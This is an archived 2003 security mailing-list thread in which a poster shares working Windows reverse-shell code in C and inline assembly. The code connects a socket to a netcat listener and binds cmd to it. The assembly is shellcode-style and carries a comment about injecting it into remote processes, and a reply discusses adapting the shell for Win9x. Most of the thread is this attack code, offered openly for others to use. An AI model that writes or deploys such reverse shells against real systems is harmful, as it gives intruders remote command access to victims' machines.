Hello s7726, Saturday, February 8, 2003, 12:09:45 AM, you wrote: s> Could this work on a win9x machine? with some mods of course. namely command s> rather than cmd, or is this strictly an NT/2k thing? s> Thanx, s> Gavin S. s> -----Original Message----- s> From: NetNinja [mailto:netninjaat_private] s> Sent: Friday, February 07, 2003 4:45 AM s> To: vuln-devat_private s> Subject: Windows reverse Shell #2 s> Hello folks, s> Thnx everyone for ur replies. s> Today i found time to have a careful look at my reverse shell C source s> code. THe problem that i had was very simple. In my C source i forgot to s> initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's s> code did initilize that struct, so big thnx to him. Another thing s> u have to do is to cast socket handle returned from WSASocket call to s> ptr type and pass it on to stdInput,stdOutput and stdErr of s> STARTUPINFO struct. s> That's it! s> If anyone is interested in reverse cmd shell for windows i have s> included both C and inline asm version. so have a look at them. s> ---- C --------------- s> /* s> reverse cmd shell s> Will spit back command shell on ur listening netcat s> on ur localhost (127.0.0.2) port 55 s> set up ur netcat eg. nc -l -p 55 -vv s> Adik (netninjaat_private) s> http://netninja.to.kg s> */ s> #include <winsock2.h> s> #include <stdio.h> s> #pragma comment(lib,"ws2_32") s> void main(int argc, char *argv[]) s> { s> WSADATA wsaData; s> SOCKET hSocket; s> STARTUPINFO si; s> PROCESS_INFORMATION pi; s> struct sockaddr_in adik_sin; s> memset(&adik_sin,0,sizeof(adik_sin)); s> memset(&si,0,sizeof(si)); s> WSAStartup(MAKEWORD(2,0),&wsaData); s> hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); s> adik_sin.sin_family = AF_INET; s> adik_sin.sin_port = htons(55); s> adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); s> connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); s> si.cb = sizeof(si); s> si.dwFlags = STARTF_USESTDHANDLES; s> si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; s> CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); s> ExitProcess(0); s> } s> ------[ end C ]-------------- s> ----[ inline ASM ]------ s> /* s> reverse cmd shell s> inline asm version s> reverse cmd shell on address 127.0.0.1 port 55 s> Adik (netninjaat_private) s> http://netninja.to.kg s> */ s> #include <winsock2.h> s> #include <stdio.h> s> #pragma comment(lib,"ws2_32") s> #define GP 0x77E7B332 s> #define LL 0x77E7D961 s> #define CreateProcessA [ebp-8] s> #define ExitProcess [ebp-0ch] s> #define WSASocketA [ebp-10h] s> #define connect [ebp-14h] s> #define CMD_STR [ebp-18h] s> #define PORT 0x3700 //(htons(55)) here u gotta s> reverse byte order 0x0037=3700 s> #define IPADDR 0x0100007F // s> 7F000001//(inet_addr("127.0.0.1")) s> void main(int argc, char *argv[]) s> { s> char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0" s> "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0"; s> char *i=ptr; s> WSADATA wsaData; s> WSAStartup(MAKEWORD(2,0),&wsaData); //initialize s> winsock, this is not done below s> // usually when u inject ur shellcode into remote process s> // socket is already initialized s> __asm s> { s> mov edi, i s> dec edi s> push ebp s> mov ebp,esp s> sub esp,0x20 s> mov ecx,ebp s> sub ecx,4h s> push ecx s> load_lib: s> inc edi s> cmp byte ptr[edi],0 s> je done_loadin s> push edi s> mov eax, LL s> call eax //LoadLibrary("Lib") s> mov [ebp-4],eax //places lib handle into ebp-4 s> xor eax,eax s> repne scasb s> load_func: s> cmp byte ptr[edi],0 s> je load_lib s> push edi s> mov ebx, dword ptr[ebp-4] //lib handle s> push ebx s> mov eax, GP s> call eax s> //GetProcAddress("Function") s> pop ecx s> sub ecx,4 s> mov dword ptr[ecx], eax s> push ecx s> xor eax,eax s> repne scasb s> jmp load_func s> done_loadin: s> xor eax,eax s> inc edi s> mov dword ptr[ebp-18h],edi s> mov ecx,50 //make some s> space for structs s> push_em: s> push eax s> loop push_em s> push 0x1 s> push 0x2 s> call WSASocketA s> mov ebx, eax //copies sockethandle returned into s> ebx s> //ebp-20h s> mov dword ptr[ebp-40h],0x2 s> //sockaddr_in s> mov word ptr[ebp-3Eh],PORT s> mov dword ptr[ebp-3Ch],IPADDR s> //mov dword ptr[ebp-40h],process_information s> mov dword ptr[ebp-94h],0x44 //sizeof startupinfo s> mov dword ptr[ebp-68h],0x100 //dwFlags s> mov dword ptr[ebp-5Ch],ebx //stdio s> mov dword ptr[ebp-58h],ebx //stdout s> mov dword ptr[ebp-54h],ebx //stderr s> push 0x10 s> //sizeof sockaddr_in s> lea edx, dword ptr[ebp-40h] s> push edx s> //ptr to sockaddr_in s> push ebx s> //socket handle s> call connect s> lea edx,dword ptr[ebp-50h] s> push edx //push s> proc_info s> lea edx,dword ptr[ebp-94h] s> push edx //push ptr s> to startupinfo s> xor edx,edx s> push edx s> push edx s> push edx s> inc edx s> //inheritHandles = true s> push edx s> dec edx s> push edx s> push edx s> mov eax,CMD_STR //ptr to "cmd" str s> push eax s> push edx s> call CreateProcessA s> push edx s> call ExitProcess s> } s> } s> ----[ end ]------ s> -- s> Best regards, s> Adik (NetNinja) mailto:netninjaat_private When i put command.com instead of cmd.exe as a parameter to CreateProcess, reverse commandshell appeared on my nc, however i failed to execute command and c the results. in addition to that my nc stopped respondin and cpu usage jumped to 100% so i had to shut it down. but u can try playing n pokin around with it. perhaps u will c different results. -- Best regards, NetNinja mailto:netninjaat_private
This archive was generated by hypermail 2b30 : Sun Feb 09 2003 - 16:01:39 PST